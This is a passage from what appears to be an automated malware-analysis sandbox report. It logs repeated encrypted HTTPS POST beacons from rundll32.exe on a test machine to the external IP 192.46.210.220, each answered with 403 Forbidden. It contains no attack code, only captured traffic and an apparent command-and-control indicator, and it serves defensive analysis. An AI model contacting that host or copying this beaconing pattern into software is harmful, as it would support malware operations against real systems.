                                                                                                      2021-10-28 02:46:37 UTC30OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:46:37 UTC34INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:46:37 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      60192.168.2.750090192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:26 UTC299OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:26 UTC299OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:27 UTC309INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:26 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      61192.168.2.750092192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:26 UTC304OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:26 UTC304OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:27 UTC309INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:27 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      62192.168.2.750098192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:30 UTC309OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:30 UTC309OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:30 UTC319INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:30 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      63192.168.2.750100192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:30 UTC314OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:30 UTC314OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:31 UTC319INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:31 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      64192.168.2.750106192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:33 UTC319OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:33 UTC319OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:34 UTC324INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:34 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      65192.168.2.750108192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:34 UTC324OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:34 UTC324OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:35 UTC329INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:35 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      66192.168.2.750114192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:37 UTC329OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:37 UTC329OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:38 UTC334INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:38 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      67192.168.2.750116192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:38 UTC334OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:38 UTC334OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:39 UTC339INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:39 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      68192.168.2.750122192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:42 UTC339OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:42 UTC339OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:43 UTC344INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:43 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      69192.168.2.750125192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:44 UTC344OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:44 UTC344OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:44 UTC349INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:44 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      7192.168.2.749805192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:46:39 UTC34OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:46:39 UTC35OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:46:40 UTC39INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:46:40 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      70192.168.2.750129192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:46 UTC349OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:46 UTC349OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:46 UTC354INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:46 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      71192.168.2.750133192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:48 UTC354OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
